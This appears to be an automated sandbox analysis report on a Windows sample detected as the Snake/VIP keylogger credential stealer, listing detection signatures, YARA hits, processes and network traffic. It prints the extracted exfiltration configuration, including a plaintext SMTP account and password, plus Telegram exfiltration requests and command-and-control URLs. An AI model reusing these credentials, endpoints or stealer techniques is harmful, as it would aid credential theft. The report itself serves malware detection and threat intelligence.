Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SP0npSA64a.exe

Overview

General Information

Sample name:SP0npSA64a.exe
renamed because original name is a hash value
Original sample name:b45b6d05b6f9fc7d8e5f813ebad0961e3a1a0ed432295ba4edc10a826d0f8516.exe
Analysis ID:1530726
MD5:ee44a293da0a4abb03fcd00a8e1478ae
SHA1:11b6ebc39fbf1888dfafe968c9a5730493eff1d8
SHA256:b45b6d05b6f9fc7d8e5f813ebad0961e3a1a0ed432295ba4edc10a826d0f8516
Tags:exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SP0npSA64a.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\SP0npSA64a.exe" MD5: EE44A293DA0A4ABB03FCD00A8E1478AE)
    • RegSvcs.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\SP0npSA64a.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.4598521069.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2dd83:$a1: get_encryptedPassword
          • 0x2e0a0:$a2: get_encryptedUsername
          • 0x2db93:$a3: get_timePasswordChanged
          • 0x2dc9c:$a4: get_passwordField
          • 0x2dd99:$a5: set_encryptedPassword
          • 0x2f439:$a7: get_logins
          • 0x2f39c:$a10: KeyLoggerEventArgs
          • 0x2f001:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 16 entries
          SourceRuleDescriptionAuthorStrings
          2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  2.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2df83:$a1: get_encryptedPassword
                  • 0x2e2a0:$a2: get_encryptedUsername
                  • 0x2dd93:$a3: get_timePasswordChanged
                  • 0x2de9c:$a4: get_passwordField
                  • 0x2df99:$a5: set_encryptedPassword
                  • 0x2f639:$a7: get_logins
                  • 0x2f59c:$a10: KeyLoggerEventArgs
                  • 0x2f201:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 15 entries

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 46.151.208.21, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7164, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49855
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-10T13:18:19.465554+020028033053Unknown Traffic192.168.2.549738188.114.97.3443TCP
                  2024-10-10T13:18:25.887673+020028033053Unknown Traffic192.168.2.549792188.114.97.3443TCP
                  2024-10-10T13:18:28.580887+020028033053Unknown Traffic192.168.2.549811188.114.97.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-10T13:18:17.719718+020028032742Potentially Bad Traffic192.168.2.549726158.101.44.24280TCP
                  2024-10-10T13:18:18.906527+020028032742Potentially Bad Traffic192.168.2.549726158.101.44.24280TCP
                  2024-10-10T13:18:20.094009+020028032742Potentially Bad Traffic192.168.2.549744158.101.44.24280TCP
                  2024-10-10T13:18:21.343986+020028032742Potentially Bad Traffic192.168.2.549753158.101.44.24280TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: SP0npSA64a.exeAvira: detected
                  Source: 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
                  Source: 2.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
                  Source: SP0npSA64a.exeReversingLabs: Detection: 65%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                  Source: SP0npSA64a.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: SP0npSA64a.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49732 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49817 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: SP0npSA64a.exe, 00000000.00000003.2225873436.00000000047B0000.00000004.00001000.00020000.00000000.sdmp, SP0npSA64a.exe, 00000000.00000003.2226120288.0000000004610000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: SP0npSA64a.exe, 00000000.00000003.2225873436.00000000047B0000.00000004.00001000.00020000.00000000.sdmp, SP0npSA64a.exe, 00000000.00000003.2226120288.0000000004610000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 011AF45Dh2_2_011AF2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 011AF45Dh2_2_011AF4AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 011AFC19h2_2_011AF961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05707EB5h2_2_05707B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05709280h2_2_05708FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570C826h2_2_0570C558
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05700FF1h2_2_05700D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570E816h2_2_0570E548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 057018A1h2_2_057015F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570CCB6h2_2_0570C9E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570ECA6h2_2_0570E9D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05701449h2_2_057011A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05703709h2_2_05703460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 057002E9h2_2_05700040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 057062D9h2_2_05706030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570BF06h2_2_0570BC38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570DEF6h2_2_0570DC28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 057032B1h2_2_05703008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05700B99h2_2_057008F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570C396h2_2_0570C0C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570E386h2_2_0570E0B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esp, ebp2_2_0570B090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05700741h2_2_05700498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esp, ebp2_2_0570B081
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05706733h2_2_05706488
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05702A01h2_2_05702758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 057079C9h2_2_05707720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 057055D1h2_2_05705328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570B5E6h2_2_0570B318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 057025A9h2_2_05702300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570D5D6h2_2_0570D308
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05705E81h2_2_05705BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05702E59h2_2_05702BB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570BA76h2_2_0570B7A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570DA66h2_2_0570D798
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05705A29h2_2_05705780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570FA56h2_2_0570F788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05707119h2_2_05706E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05704D21h2_2_05704A78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570D146h2_2_0570CE78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570F136h2_2_0570EE68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05701CF9h2_2_05701A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 057048C9h2_2_05704620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05706CC1h2_2_05706A18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0570F5C6h2_2_0570F2F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05705179h2_2_05704ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05707571h2_2_057072C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05702151h2_2_05701EA8

                  Networking

                  barindex
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficTCP traffic: 192.168.2.5:49855 -> 46.151.208.21:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2010/10/2024%20/%2018:33:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49744 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49726 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49753 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49738 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49811 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49792 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49855 -> 46.151.208.21:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49732 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2010/10/2024%20/%2018:33:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: mail.irco.com.sa
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 10 Oct 2024 11:18:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: SP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: SP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: SP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
